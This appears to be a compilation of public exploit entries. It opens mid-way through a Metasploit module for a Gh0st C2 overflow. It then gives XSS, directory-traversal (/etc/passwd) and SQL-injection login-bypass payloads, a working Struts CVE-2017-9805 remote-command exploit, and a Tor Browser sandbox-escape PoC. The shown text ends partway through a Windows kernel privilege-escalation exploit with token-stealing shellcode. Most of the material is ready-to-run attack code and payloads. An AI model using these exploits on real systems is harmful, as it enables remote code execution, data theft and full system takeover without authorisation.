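        This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
      },
      'Author' => 'Professor Plum',
      'License' => MSF_LICENSE,
      'References' =>
        [
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
      'Payload' =>
        {
          'Space' => 1000,
          'BadChars' => '',
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
        },
      'Platform' => 'win',
      'DisclosureDate' => 'Jul 27 2017',
      'Targets' =>
        [
          ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
        ],
      'Privileged' => false,
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
        Opt::RPORT(80)
      ]
    )
  end

  # Frames one Gh0st packet.
  #
  # @param id [Integer] one-byte command id prepended to the body
  # @param data [String] body bytes
  # @return [String] MAGIC + total length + uncompressed length + deflated body
  def make_packet(id, data)
    msg = id.chr + data
    compressed = Zlib::Deflate.deflate(msg)
    datastore['MAGIC'] + [HEADER_SIZE + compressed.size].pack('V') + [msg.size].pack('V') + compressed
  end

  # Checks that +data+ is a well-formed Gh0st packet: present, long enough,
  # starts with MAGIC, declares its own size, and inflates to the declared
  # uncompressed length. Malformed input is reported and yields false rather
  # than raising (a bad zlib stream used to propagate Zlib::DataError).
  #
  # @param data [String, nil] bytes read from the peer
  # @return [Boolean]
  def validate_response(data)
    if data.nil?
      print_status('Server closed connection')
      return false
    end
    if data.empty?
      print_status('No response recieved')
      return false
    end
    if data.size < HEADER_SIZE
      print_status('Invalid packet')
      # inspect keeps raw peer bytes from being written to the console as-is
      print_status(data.inspect)
      return false
    end

    magic = datastore['MAGIC']
    mag, pktlen, msglen = data[0, HEADER_SIZE].unpack("a#{magic.size}VV")
    unless mag.index(magic) == 0
      print_status('Bad magic: ' + mag[0, magic.size].inspect)
      return false
    end
    if pktlen != data.size
      print_status('Packet size mismatch')
      return false
    end

    begin
      msg = Zlib::Inflate.inflate(data[HEADER_SIZE..-1])
    rescue Zlib::Error => e
      print_status("Packet decompress failure: #{e.message}")
      return false
    end
    if msg.size != msglen
      print_status('Packet decompress failure')
      return false
    end
    true
  end

  # Sends a heartbeat (command 101) and reports Appears when the reply is a
  # valid Gh0st packet. The connection is always closed afterwards.
  #
  # @return [Exploit::CheckCode]
  def check
    connect
    sock.put(make_packet(101, "\x00")) # heartbeat
    if validate_response(sock.get_once || '')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  ensure
    disconnect if sock
  end

  def exploit
    print_status("Trying target #{target.name}")
    print_status('Spraying heap...')
    # NOTE(review): the spray connections are never disconnected unless a
    # reply fails validation; presumably deliberate — confirm.
    101.times do
      connect
      sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
      unless validate_response(sock.get_once)
        disconnect
        return
      end
    end

    # Command ids 103..107 are tried in turn; a validated reply means that id
    # did not trigger the overflow, so move on to the next one.
    (103..107).each do |cmd|
      print_status("Trying command #{cmd}...")
      begin
        connect
        sploit = make_packet(cmd, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
        sock.put(sploit)
        next if validate_response(sock.get_once)
        sleep(0.1)
        break
      rescue EOFError
        print_status('Invalid')
      end
    end

    handler
    disconnect
  end
end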
# Exploit Title: HRM - Workable Zone : Ultimate HR System <= 1.2 - Unauthenticated Directory Traversal / Stored XSS
# Date: 2017-09-05
# Exploit Author: 8bitsec
# Vendor Homepage: http://workablezone.com
# Software Link: https://codecanyon.net/item/hrm-workable-zone-ultimate-hr-system/20182372
# Version: 1.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-05
Product & Service Introduction:
===============================
Workable Zone is probably one of the most customizable human resource (HR) management software packages for companies of all sizes.
Technical Details & Description:
================================
Multiple Stored XSS vulnerabilities found.
Directory Traversal vulnerability can disclose sensitive files.
Proof of Concept (PoC):
=======================
Stored XSS:
Logged as Employee:
Write your payload on:
Profile > Last Name
Other vulnerable fields include: First Name, Contact Number
Unauthenticated Directory Traversal:
http://localhost.com/download?type=document&filename=../../../../../etc/passwd
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
# # # # #
# Exploit Title: Online Invoice System 3.0 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.onlineinvoicesystem.com/
# Software Link: http://www.onlineinvoicesystem.com/index_v3.html
# Demo: http://www.onlineinvoicesystem.com/onlineinvoicesystem3/index.php
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# Bypass
# http://localhost/[PATH]/index.php
# User: 'or 1=1 or ''=' Pass: anything
# User: anything Pass: 'or 1=1 or ''='
#
# Sql
# http://localhost/[PATH]/editclient.php?cid=[SQL]
# -5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+-
#
# http://localhost/[PATH]/admin_invoice_print.php?id=[SQL]
#
# http://localhost/[PATH]/edit_invoice.php?id=[SQL]
#
# http://localhost/[PATH]/admin_invoice.php?id=[SQL]
# Etc...
# # # # #
# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 – Struts 2.5.12
# Tested on: Struts 2.5.10
# CVE : 2017-9805
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps & G4mbl3r
# *****************************************************
import requests
import sys
def exploration(command):
    """Send the CVE-2017-9805 XStream payload to the REST endpoint given in argv[1].

    ``command`` is spliced verbatim into the ``<string>`` element that is
    handed to ``/bin/sh -c`` below; it is not XML-escaped, so a command
    containing ``<`` or ``&`` produces a malformed document instead of
    running. The target URL is read from ``sys.argv[1]`` here rather than
    taken as a parameter, and the HTTP response body is printed whatever
    the status code, so a patched target is not reported as such.

    Detection note: the request is a POST with ``Content-Type:
    application/xml`` whose body carries
    ``jdk.nashorn.internal.objects.NativeString`` and
    ``java.lang.ProcessBuilder`` elements; those element names are a
    reliable signature of this payload in web-server and WAF logs.
    """
    exploit = '''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
    # URL comes from the command line, not from the caller.
    url = sys.argv[1]
    # The browser User-Agent only disguises the client; the XML content type is
    # what makes the REST plugin route the body to its XStream handler.
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
               'Content-Type': 'application/xml'}
    request = requests.post(url, data=exploit, headers=headers)
    # No status-code check: the body is echoed even on 4xx/5xx.
    print (request.text)
# Usage banner when fewer than two positional arguments are supplied. Note the
# usage error exits with status 0, so a caller cannot tell it from success.
if len(sys.argv) < 3:
    print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
    print ('[*] Warflop - http://securityattack.com.br')
    print ('[*] Greatz: Pimps & G4mbl3r')
    print ('[*] Use: python struts2.py URL COMMAND')
    print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
    exit(0)
else:
    # argv[1] (the URL) is read inside exploration() itself.
    exploration(sys.argv[2])
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2
**EDIT: I mixed up two different sandboxes; see the comment below for a correction.**
From inside the Linux sandbox described in
<https://blog.torproject.org/blog/tor-browser-70-released>, it is
still possible to talk to the X server without any restrictions.
This means that a compromised browser can e.g. use the
XTEST X protocol extension
(<https://www.x.org/releases/X11R7.7/doc/xextproto/xtest.html>) to
fake arbitrary keyboard and mouse events, directed at arbitrary
windows. This permits a sandbox breakout, e.g. by injecting keypresses
into a background window.
<https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux#HowdoIprotectmyselffromXexploits>
mentions that the X server is reachable, but it sounds like the author
didn't realize that a normal connection to the X server permits
sandbox breakouts by design.
To reproduce:
Install Debian Jessie with the Xfce4 desktop environment and with
backports enabled.
Install bubblewrap and xdotool.
Install the sandboxed Tor browser from
<https://www.torproject.org/dist/torbrowser/7.0a4/sandbox-0.0.6-linux64.zip>.
Launch the sandboxed Tor browser, use the default configuration. When
the browser has launched, close it.
Delete ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.
Store the following as ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.c:
=========================
*/
#include <stdlib.h>
#include <unistd.h>
int main(void){
    /*
     * Stand-in "firefox" binary for the PoC described above. From inside the
     * sandbox it execs the bundled xdotool three times, synthesising X11 key
     * events against whichever host window has focus, then parks forever so
     * the launcher sees a running browser.
     *
     * Notes on the visible code:
     * - perror() is declared in <stdio.h> and wait() in <sys/wait.h>; neither
     *   header is included, so this only builds where the compiler tolerates
     *   implicit declarations (warnings with gcc of that era).
     * - the /home/amnesia/... paths are presumably the sandbox-side view of
     *   ~/.local/share/sandboxed-tor-browser/tor-browser/ from the setup
     *   steps above - confirm on the host being tested.
     * - LD_LIBRARY_PATH points xdotool at the shared libraries the setup step
     *   copies next to it (this file itself is built -static).
     * - each wait() reaps one child; `status` is never inspected.
     */
    int status;
    setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1);
    if (fork() == 0) {
        /* child 1: open the Xfce run dialog (alt+F2) and type the terminal name */
        execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "key", "alt+F2", "sleep", "1", "type", "xfce4-terminal", NULL);
        perror("fail"); /* only reached if execl() failed */
        return 0;
    }
    wait(&status);
    if (fork() == 0) {
        /* child 2: confirm the dialog, then type a command into the new terminal */
        execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", "sleep", "1", "type", "id", NULL);
        perror("fail");
        return 0;
    }
    wait(&status);
    if (fork() == 0) {
        /* child 3: submit the typed command */
        execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", NULL);
        perror("fail");
        return 0;
    }
    wait(&status);
    /* keep the process alive indefinitely; unreachable return below */
    while (1) sleep(1000);
    return 0;
}
/*
=========================
In ~/.local/share/sandboxed-tor-browser/tor-browser/Browser, run
"gcc -static -o firefox firefox.c".
Run "cp /usr/bin/xdotool /usr/lib/x86_64-linux-gnu/* ~/.local/share/sandboxed-tor-browser/tor-browser/".
Now run the launcher for the sandboxed browser again. Inside the
sandbox, the new firefox binary will connect to the X11 server and
send fake keypresses to open a terminal outside the sandbox and type
into it.
There are probably similar issues with pulseaudio when it's enabled;
I suspect that it's possible to e.g. use the pulseaudio socket to load
pulseaudio modules with arbitrary parameters, which would e.g. permit
leaking parts of files outside the sandbox by using them as
authentication cookie files for modules that implement audio streaming
over the network.
###################################################################
I mixed up two sandboxes.
The blog post <https://blog.torproject.org/blog/tor-browser-70-released> talks about the Firefox content process sandbox, which is still in development and unrelated to the Tor-specific sandbox I looked at. So the "content sandboxing" the blog post talks about isn't very effective yet; the Mozilla wiki points to multiple bug lists that document the remaining work (https://wiki.mozilla.org/Security/Sandbox#Bug_Lists).
The sandbox I looked at here is written and distributed by the Tor Project.
https://gitweb.torproject.org/tor-browser/sandboxed-tor-browser.git/commit/?id=1bfbd7cc1cd60c9468f2e33a3d4816973f1fb2f5 was added to mitigate the issue I reported by filtering X11 traffic and whitelisting permitted X protocol extensions.
More warnings have been added to the corresponding documentation (https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux?action=diff&version=23&old_version=21) that point out that this sandbox should not be used without manually configuring nested X11 and that pulseaudio is unsafe.
*/
# -*- coding: utf-8 -*-
"""
Jungo DriverWizard WinDriver Kernel Out-of-Bounds Write Privilege Escalation Vulnerability
Download: http://www.jungo.com/st/products/windriver/
File: WD1240.EXE
Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba
Driver: windrvr1240.sys
Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad
CVE: CVE-2017-14075
Author: Steven Seeley (mr_me) of Source Incite
Affected: <= v12.4.0
Thanks: b33f and sickness
Summary:
========
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the processing of IOCTL 0x953824a7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in an out-of-bounds write condition. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
Vulnerability:
==============
The vulnerability occurs in sub_405644 at loc_4056CD:
.text:004056CD loc_4056CD: ; CODE XREF: sub_405644+6A
.text:004056CD mov eax, [ebx]
.text:004056CF xor edx, edx
.text:004056D1 mov byte ptr [edi+eax], 0 ; null byte write
.text:004056D5 mov eax, P
.text:004056DA add [eax+880h], edi ; offset HalDispatchTable[1]+0x880 is null and writable
Exploitation:
=============
At 0x004056da there is a second write, but since HalDispatchTable[1]+0x880 points to a null dword that is in a writable location, no memory is modified outside of our null byte write (0x004056d1).
Since we can do that, we can keep calling the vuln ioctl code and push down the kernel pointer from HalDispatchTable[1] to reach userland. We could have just done 2 bytes, but I chose 3 for reliability.
Finally, the shellcode repairs the HalDispatchTable[1] pointer by reading HalDispatchTable[2] and calculating the offset to the HalDispatchTable[1] pointer and then re-writes the correct pointer back into the HalDispatchTable.
Timeline:
=========
2017-08-22 – Verified and sent to Jungo via sales@/first@/security@/info@jungo.com
2017-08-25 – No response from Jungo and two bounced emails
2017-08-26 – Attempted a follow up with the vendor via website chat
2017-08-26 – No response via the website chat
2017-09-03 – Received an email from a Jungo representative stating that they are "looking into it"
2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release
2017-09-06 – No response from Jungo
2017-09-06 – Public 0day release of advisory
Example:
========
C:\Users\Guest\Desktop>icacls poc.py
poc.py NT AUTHORITY\Authenticated Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
Mandatory Label\Low Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Guest\Desktop>whoami
debugee\guest
C:\Users\Guest\Desktop>poc.py
--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]
Steven Seeley (mr_me) of Source Incite
(+) spraying pool with mixed objects...
(+) sprayed the pool!
(+) making pool holes...
(+) made the pool holes!
(+) allocating shellcode...
(+) allocated the shellcode!
(+) triggering pool overflow...
(+) allocating pool overflow input buffer
(+) elevating privileges!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Guest\Desktop>whoami
nt authority\system
C:\Users\Guest\Desktop>
"""
import os
import sys
import struct
from ctypes import *
from ctypes.wintypes import *
from platform import release, architecture
# Win32 API entry points used below: CreateFileA, WriteProcessMemory,
# LoadLibraryA, GetProcAddress.
kernel32 = windll.kernel32
# Native API entry points used below: NtAllocateVirtualMemory,
# NtQuerySystemInformation, ZwDeviceIoControlFile, NtQueryIntervalProfile.
ntdll = windll.ntdll
# GLOBAL VARIABLES
# Allocation-type flags and page protection passed to NtAllocateVirtualMemory.
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
# NTSTATUS value the allocation helpers compare against.
STATUS_SUCCESS = 0
class SYSTEM_MODULE_INFORMATION(Structure):
    """
    First module record returned by NtQuerySystemInformation(11) (see
    get_HALDispatchTable_kernel_address). Only the first entry is ever
    marshalled, so the leading 32-bit entry count of the buffer is folded into
    ``Reserved`` by giving it an extra pointer slot. The field sizes assume a
    32-bit process, matching the Windows 7 x86 precondition in main().
    """
    _fields_ = [("Reserved", c_void_p * 3), # this has an extra c_void_p because the first 4 bytes = number of return entries.
                ("ImageBase", c_void_p), # it's not actually part of the structure, but we are aligning it.
                ("ImageSize", c_ulong),
                ("Flags", c_ulong),
                ("LoadOrderIndex", c_ushort),
                ("InitOrderIndex", c_ushort),
                ("LoadCount", c_ushort),
                ("ModuleNameOffset", c_ushort),
                ("FullPathName", c_char * 256)] # kernel image path; basename used as LoadLibraryA argument
def alloc_shellcode(base, input_size, HalDispatchTable1):
    """
    allocates some shellcode

    Maps ``input_size`` bytes of RWX memory at ``base`` in the current process
    and copies the token-swapping shellcode there, padded with int3.

    :param base: requested user-mode address. main() passes 0x000000a2, which
        lies in the null page; that mapping being refused on later Windows
        builds is presumably one reason main() restricts this to Windows 7 x86.
    :param input_size: allocation size; the shellcode is padded to it with 0xcc.
    :param HalDispatchTable1: kernel address of HalDispatchTable[1]. The
        "recover" stub reads HalDispatchTable[2] (this + 4), subtracts 0x912 and
        writes the result back into HalDispatchTable[1] so the entry the writes
        corrupted is restored before returning to the kernel.
    :return: True on success, False if the allocation or the copy failed.
    """
    print "(+) allocating shellcode @ 0x%x" % base
    baseadd = c_int(base)
    size = c_int(input_size)
    # get the repair address
    HalDispatchTable2 = struct.pack("<I", HalDispatchTable1+0x4)
    # --[ setup]
    # All structure offsets below (KTHREAD 0x124, EPROCESS 0x50, TOKEN 0xf8,
    # FLINK 0xb8, PID 0xb4) are hard-coded for Windows 7 x86 (see main()).
    # `input` shadows the builtin; harmless here.
    input = "\x60" # pushad
    input += "\x64\xA1\x24\x01\x00\x00" # mov eax, fs:[KTHREAD_OFFSET]
    input += "\x8B\x40\x50" # mov eax, [eax + EPROCESS_OFFSET]
    input += "\x89\xC1" # mov ecx, eax (Current _EPROCESS structure)
    input += "\x8B\x98\xF8\x00\x00\x00" # mov ebx, [eax + TOKEN_OFFSET]
    # --[ copy system PID token]
    input += "\xBA\x04\x00\x00\x00" # mov edx, 4 (SYSTEM PID)
    input += "\x8B\x80\xB8\x00\x00\x00" # mov eax, [eax + FLINK_OFFSET] <-|
    input += "\x2d\xB8\x00\x00\x00" # sub eax, FLINK_OFFSET |
    input += "\x39\x90\xB4\x00\x00\x00" # cmp [eax + PID_OFFSET], edx |
    input += "\x75\xed" # jnz ->|
    input += "\x8B\x90\xF8\x00\x00\x00" # mov edx, [eax + TOKEN_OFFSET]
    input += "\x89\x91\xF8\x00\x00\x00" # mov [ecx + TOKEN_OFFSET], edx
    # --[ recover]
    # 0x912 is the assumed distance between the HalDispatchTable[2] and [1]
    # targets on the tested build - TODO confirm per target.
    input += "\xbe" + HalDispatchTable2 # mov esi, HalDispatchTable[2]
    input += "\x8b\x16" # mov edx, [esi]
    input += "\x81\xea\x12\x09\x00\x00" # sub edx, 0x912
    input += "\x83\xee\x04" # sub esi, 0x4
    input += "\x89\x16" # mov [esi], edx
    input += "\x61" # popad
    input += "\xC3" # ret
    # pad to input_size with int3 (main() passes 0x1000, far larger than the stub)
    input += "\xcc" * (input_size-len(input))
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    # 0xffffffff is (HANDLE)-1, the current-process pseudo-handle.
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
                                             byref(size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        # NB: for a negative NTSTATUS this prints one less than the unsigned
        # code; `& 0xffffffff` would be exact.
        print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
        return False
    written = c_ulong()
    write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
    if write == 0:
        print "(-) Error while writing our input buffer memory: %s" % write
        return False
    return True
def alloc(base, input_size):
    """
    Just allocates things.

    Commits ``input_size`` bytes of RWX memory at ``base`` in the current
    process (used by main() for the IOCTL input buffer at 0x41414141).

    :param base: requested user-mode address (rounded down to a page by the kernel)
    :param input_size: bytes to allocate
    :return: True on success, False (after printing the status) otherwise
    """
    baseadd = c_int(base)
    size = c_int(input_size)
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    # 0xffffffff is (HANDLE)-1, the current-process pseudo-handle.
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
                                             byref(size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        # NB: for a negative NTSTATUS this prints one less than the unsigned
        # code; `& 0xffffffff` would be exact.
        print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
        return False
    return True
def mymemset(base, location, size):
    """
    A cheap memset ¯\_(ツ)_/¯

    Fills ``size`` bytes at ``base`` with ``location`` repeated.

    :param base: user-mode address to write to
    :param location: byte string pattern (a packed 4-byte address from the caller)
    :param size: total bytes to write; ``size/len(location)`` is Python 2
        integer division, so a ``size`` that is not a multiple of
        ``len(location)`` is rounded down (under Python 3 this would raise,
        as float * str is invalid).
    :return: True on success, False if WriteProcessMemory failed
    """
    input = location * (size/len(location))
    written = c_ulong()
    # 0xFFFFFFFF is (HANDLE)-1, the current-process pseudo-handle.
    write = kernel32.WriteProcessMemory(0xFFFFFFFF, base, input, len(input), byref(written))
    if write == 0:
        print "(-) Error while writing our input buffer memory: %s" % write
        return False
    return True
def get_HALDispatchTable_kernel_address():
    """
    This function gets the HALDispatchTable's kernel address

    Resolves the kernel-mode address of HalDispatchTable by (1) asking
    NtQuerySystemInformation (class 11, SystemModuleInformation) for the loaded
    module list, whose first entry is the kernel image, (2) loading that image
    into this process with LoadLibraryA and resolving the exported
    HalDispatchTable symbol, and (3) adding the symbol's RVA to the kernel's
    ImageBase. Both NtQuerySystemInformation return codes (``res``) are
    ignored, so a refused query is not detected before the structure is read
    from the zero-initialised buffer.

    :return: kernel address of HalDispatchTable (int)
    """
    # allocate arbitrary buffer and call NtQuerySystemInformation
    # first call with a zero-length buffer only to learn the required size
    b = create_string_buffer(0)
    systeminformationlength = c_ulong(0)
    res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength))
    # call NtQuerySystemInformation second time with right size
    b = create_string_buffer(systeminformationlength.value)
    res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength))
    # marshal raw bytes for 1st entry
    smi = SYSTEM_MODULE_INFORMATION()
    memmove(addressof(smi), b, sizeof(smi))
    # get kernel image name
    kernelImage = smi.FullPathName.split('\\')[-1]
    print "(+) found %s kernel base address: 0x%x" % (kernelImage, smi.ImageBase)
    # load kernel image in userland and get HAL Dispatch Table offset
    hKernelImage = kernel32.LoadLibraryA(kernelImage)
    print "(+) loading %s in userland" % kernelImage
    print "(+) found %s Userland Base Address : 0x%x" % (kernelImage, hKernelImage)
    hdt_user_address = kernel32.GetProcAddress(hKernelImage,"HalDispatchTable")
    print "(+) found HalDispatchTable userland base address: 0x%x" % hdt_user_address
    # calculate HAL Dispatch Table offset in kernel land
    # the RVA is the same in both mappings, so rebase it onto the kernel ImageBase
    hdt_kernel_address = smi.ImageBase + ( hdt_user_address - hKernelImage)
    print "(+) found HalDispatchTable kernel base address: 0x%x" % hdt_kernel_address
    return hdt_kernel_address
def write_one_null_byte(HWD, in_buffer, location):
    """
    The primitive function

    Fills ``in_buffer`` with ``location`` repeated (see mymemset) and sends
    IOCTL 0x953824a7 to the driver handle; per the advisory above the driver
    then writes a single 0x00 at the address it takes from that buffer.

    :param HWD: handle returned by CreateFileA in main(). CreateFileA reports
        failure with INVALID_HANDLE_VALUE (-1), which is truthy, so the
        ``if HWD`` guard below does not catch a failed open.
    :param in_buffer: user-mode address of the 0x1000-byte input buffer
    :param location: 4-byte packed target address (struct.pack("<I", ...))
    :return: True once the IOCTL has been issued (its NTSTATUS is not
        inspected), False only when ``HWD`` is falsy
    """
    mymemset(in_buffer, location, 0x1000)
    if HWD:
        IoStatusBlock = c_ulong()
        dev_ioctl = ntdll.ZwDeviceIoControlFile(HWD,
                                                None,
                                                None,
                                                None,
                                                byref(IoStatusBlock),
                                                0x953824a7, # target
                                                in_buffer, # special buffer
                                                0x1000, # just the size to trigger with
                                                0x20000000, # whateva
                                                0x1000 # whateva
                                                )
        # we could check dev_ioctl here I guess
        # (a failed IOCTL is therefore reported as success to the caller)
        return True
    return False
def we_can_elevate(h, in_buffer, base):
    """
    This just performs the writes...

    Zeroes the three high bytes of the dword at ``base`` (HalDispatchTable[1],
    see main()) one byte at a time via write_one_null_byte, then calls
    NtQueryIntervalProfile, which dispatches through HalDispatchTable[1]. With
    only the low byte of the original pointer left, that dispatch lands in the
    user-mode page main() mapped with alloc_shellcode (0x000000a2 - presumably
    the pointer's low byte on the tested build; confirm per target).

    :param h: driver handle from CreateFileA (never validated, see write_one_null_byte)
    :param in_buffer: address of the allocated IOCTL input buffer
    :param base: kernel address of HalDispatchTable[1]
    :return: True after the NtQueryIntervalProfile call, False if a write step
        reported failure (which only happens when ``h`` is falsy)
    """
    # get location of first byte write
    # byte order: most significant byte (base+3) first, then +2, then +1
    where2write = struct.pack("<I", base + 0x3)
    print "(+) triggering the first null byte write..."
    if write_one_null_byte(h, in_buffer, where2write):
        # get the location of the second byte write
        where2write = struct.pack("<I", base + 0x2)
        print "(+) triggering the second null byte write..."
        if write_one_null_byte(h, in_buffer, where2write):
            # get the location of the third byte write
            where2write = struct.pack("<I", base + 0x1)
            print "(+) triggering the third null byte write..."
            if write_one_null_byte(h, in_buffer, where2write):
                # eop
                print "(+) calling NtQueryIntervalProfile to elevate"
                arb = c_ulong(0)
                # 0x1337 is an arbitrary profile source; the return value is ignored
                ntdll.NtQueryIntervalProfile(0x1337, byref(arb))
                return True
    return False
def main():
    """
    Entry point: opens the WinDrvr1240 device, locates HalDispatchTable,
    stages the shellcode and the IOCTL input buffer, drives the three writes
    and, on success, spawns cmd.exe from the (now elevated) process.

    Review notes on the visible code:
    - the guard ``release() != "7" and architecture()[0] == "32bit"`` only
      rejects a non-7 *32-bit* Windows; a 64-bit host of any version passes
      it, contradicting the printed message. ``release() != "7" or
      architecture()[0] != "32bit"`` would match the stated intent.
    - ``h`` is not checked against INVALID_HANDLE_VALUE (-1), so a missing
      driver is only noticed when the IOCTLs silently do nothing.
    - ``dwReturn`` and ``in_size`` are assigned but unused (alloc() is called
      with the literal 0x1000).
    """
    print "\n\t--[ Jungo DriverWizard WinDriver Kernel Write EoP exploit ]"
    print "\t Steven Seeley (mr_me) of Source Incite\r\n"
    if release() != "7" and architecture()[0] == "32bit":
        print "(-) this exploit will only work for Windows 7 x86."
        print " patch the shellcode for other windows versions."
        sys.exit(-1)
    print "(+) attacking target WinDrvr1240"
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    DEVICE_NAME = "\\\\.\\WinDrvr1240"
    dwReturn = c_ulong()
    h = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
    # get the second HalDispatchTable entry[0]
    # HalDispatchTable + 4 == &HalDispatchTable[1]
    base = get_HALDispatchTable_kernel_address() + 0x4
